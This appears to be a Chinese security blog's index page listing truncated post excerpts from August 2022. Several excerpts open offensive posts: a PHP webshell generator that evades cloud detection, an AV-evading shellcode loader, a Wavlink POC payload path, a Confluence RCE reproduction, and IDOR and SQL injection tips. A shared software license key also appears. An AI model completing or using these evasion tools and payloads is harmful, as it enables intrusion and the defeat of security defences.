CVE-2022-26134 Confluence OGNL RCE 漏洞复现 2022-08-29
漏洞范围Confluence Server and Data Center >= 1.3.0Confluence Server and Data Center < 7.4.17Confluence Server and Data Center < 7.13.7Confluence Server and Data Center < 7.14.3Confluence Se...
分享一个PHP免杀脚本 可以过百度云Webshell检测 2022-08-29
过不了阿里云 原理是来自于Weevely工具#!/usr/bin/python3 import random import string #这里输自定义干扰字符 add_interfere_str='CnM' Referer = 'https://developer.mozilla.'+ add_interfere_str +'.org/testpage.html' notice =...
AsamF版本更新。集成爱企查。 2022-08-27
1.增加爱企查通过公司名称查域名功能;2.增加爱企查批量公司名查询域名功能;3.增加爱企查通过公司名查备案信息、分支机构、控股公司占比及域名信息功能;4.增加fofa排除蜜罐功能。由于fofa政策修改,该功能目前企业会员才能支持。https://github.com/Kento-Sec/AsamF/V0.1.2版本更新
AUTO_Uninstaller_9.5.90 密匙分享 2022-08-23
AUTO_Uninstaller_9.5.90 密匙分享8月23日后20天可用密钥:AxM9eKMKAaeeacKZrciiyMxAri6nnAe9nu6yK9KinrAiAiZnAeirKuaiAKeice8u##
智慧中小学快速播放自动下一条浏览器插件 2022-08-23
是个chrome浏览器扩展按照里边帮助文件安装即可暑期10学时,可以很快搞定!https://github.com/liuhengloveyou/zxx.edu.cn原地址转蓝奏https://668108.lanzoum.com/i6WbS0a09s6j还有一个方法:用手机直接将视频投屏,只要显示投屏成功换到下一个视频,几分钟搞定所有视频。
北京地铁某站点自动预约入站源码php 2022-08-22
因之前在沙河住着,但是每天上班进地铁要排队,然而地铁有预约功能,但是根本就抢不到,估计沙河居住的IT大佬有点多,都是高科技预约的,所以就研究了一下,挂在软件上可设置定时自动预约。目前支持预约站点:直接上图:登录地址:https://webui.mybti.cn/#/login?clientid=e8725b01-c216-4e29-92a5-f2d1d2343fdc获取authorizati...
8种src常用越权测试小技巧 2022-08-18
(1)添加参数user/infouser/info?id=123(2)hpp 参数污染user/info?id=1user/info?id=2&id=1user/info?id=2,2&id=1,1(3)添加.json(如果它是用 ruby 构建的)user/id/1user/id/1.json(4)测试过时的api的版本/v3/user/123/v2/user/123过时的api的版本/v...
学python得永生,python大法好之利用python编写CVE-2022-34049 poc 2022-08-10
漏洞说明Wavlink WN530HG4 M30HG4.V5030.191116中存在访问控制问题,未经验证的攻击者可以下载日志文件和配置数据。影响版本Wavlink WN530HG4 M30HG4.V5030.191116漏洞复现fofa:title="Wi-Fi APP Login"payload:/cgi-bin/ExportLogs.shPOC#!/usr/bin...
免杀360的shellcode加载器 2022-08-10
#include <Windows.h> #include <stdio.h> HMODULE GetKernel32Addr() { HMODULE Kernel32Base = 0; _asm { mov eax, fs:[0x30] //peb mov eax, d...
VyOS利用WireGuard配置hub和spoke VPN测试 2022-08-10
备注:1.如果hub配置两个wireguard接口并用不同的监听端口,分别与两个spoke连接,这时可以跑ospf,spoke之间可以通过hub中转进行互联。2.如果用下面的只配置一个wireguard接口,使用多个证书的情况,测试的时候,hub只能与一个spoke建立osp邻居,即使像DMVPN第三阶段,修改OSPF优先级,或者更改网络类型hub也不能同时与两个spoke建立邻居.3..因...
元气骑士ios4.2.6最新全角色全皮肤全材料无限金币宝石存档 2022-08-10
使用方法如下:下载imazing和存档连接你的iphone,选择管理应用程序找到元气骑士右键选择恢复应用程序数据,选择存档文件注意:你的手机将会重启,请按imazing里面的提示来链接:https://wwd.lanzouw.com/iRIQh0988bfc
百日行动丨贩卖上亿条公民个人信息获利三千万,这帮人可真“刑” 2022-08-06
近日,杭州网警紧密结合夏季治安打击整治 “百日行动”,成功破获一起侵犯公民个人信息案。该案手段新颖、涉众面广,利用皮包公司与企业开展虚假合作骗取上亿条公民个人信息。截至目前,警方共抓获犯罪嫌疑人 12 名,依法采取刑事强制措施 11 名,查获涉及公民个人信息数据 4 亿余条,扣押计算机、手机、硬盘等作案设备 50 余件,涉案资金 3 千万元。“三有” 团伙:有技术、有案底、有野心年轻的贾某和...
AsamF发布更新了,增加了许多功能 2022-08-06
https://github.com/Kento-Sec/AsamF增加:优化各个平台的取key,通过 -fk -hk -qk -zk 可以分别取key;新增了判断ip是否为蜜罐功能;-domian、-app、-host、-title、-port、-server、-ih 这几个选项会聚合平台来搜索。具体见-h描述。-fofatotal 可以配合 -fields 使用,默认值为title。-z...
2022年最详细的SQL注入总结笔记 2022-08-04
一、sql注入概述SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息,在实战和测试中,难免会遇见到一些sql注入,下面,我将总结一些常用sql注入中的不同姿势。二、寻找sql注入测试...
为了买套 Java 的交易所,上当了, 1000U 已经离我而去。 2022-08-04
Bico Global 合约交易期权交易介绍https://www.bicopromax.comh5.bicopromax.com此演示站所有者是骗子,声明是自己开发的,支付 1000U 后搭建半成品,催尾款,说需要时间测试下,结果小飞机拉黑了,虽然之前购买的时候已经做好被黑准备,但是现在真正发生了,还是忍不住要 FuC**。骗子的联系方式:@BicoGlobalQQ443518663这套系...
分享一个企业备案查询的脚本-2 2022-08-04
声明:本资料仅供学习交流,严禁使用于商业、非法用途!!!之前不是发了一个备案查询的脚本嘛,详情可见有师傅反应说接口数据不太对,因为那个接口用的都是缓存库,确实太老了,新的得vip(手动狗头)根据我的需求确实能满足,以下改的就纯单学习交流了,获取的还是比之前要全很多另外师傅们注意,还是根据需求来写的,所以仅限根据企业名称获取备案功能!!!还有,没去细扣js了,直接用的selenium,师傅们如...
交行活动总结 2022-08-04
1、福利季月月有礼交通银行APP-搜索“交行福利季”-交行福利季月月有礼好运连连完成任务,可抽3次0.88~888元支付券(月月支付有礼充值余额宝这些就行)2、福利季七夕有礼交通银行APP-搜索“福利季”-福利季七夕专场完成任务,可抽1次2~88元支付券。3、羊毛月刊观看礼交通银行APP首页-热门活动“羊毛8月刊”-活动推荐“观看有礼”视频界面右侧福袋图标进去抽1.8~5.8元支付券。4、福...
批量打印PrintConductor 办公利器 2022-08-04
关键是,界面简单,操作方便,能打印的格式都可以批量打印,测试文件有:dwg.cdr.xlsx.pdf.pptx.psd.pub.txt.docx.png文件已经让我制作单文件首次打开是英文状态,设置中文语言后,每次打开软件默认中文了,因为是单文件所以每次打开都要输入激活码,点取消即可,不影响使用。Win7和10亲测
正版阿香婆音乐软件限时免费领取永久授权 Ashampoo Music Studio 2022 中文版 2022-08-04
正版阿香婆音乐软件限时免费领取永久授权 Ashampoo Music Studio 2022 中文版德国老牌软件开发商Ashampoo再次推出正版限制软件活动。这次分享君给大家分享一个音乐工作室软件,对于喜欢管理音乐的用户,可以用它来更好地管理自己的音乐收藏。Ashampoo Music Studio 2022是一款面向音乐爱好者的完整数字音乐解决方案,软件可以为您的音乐项目设计一个合适的封...
微信里点“发现”,扫一下
二维码便可将本文分享至朋友圈。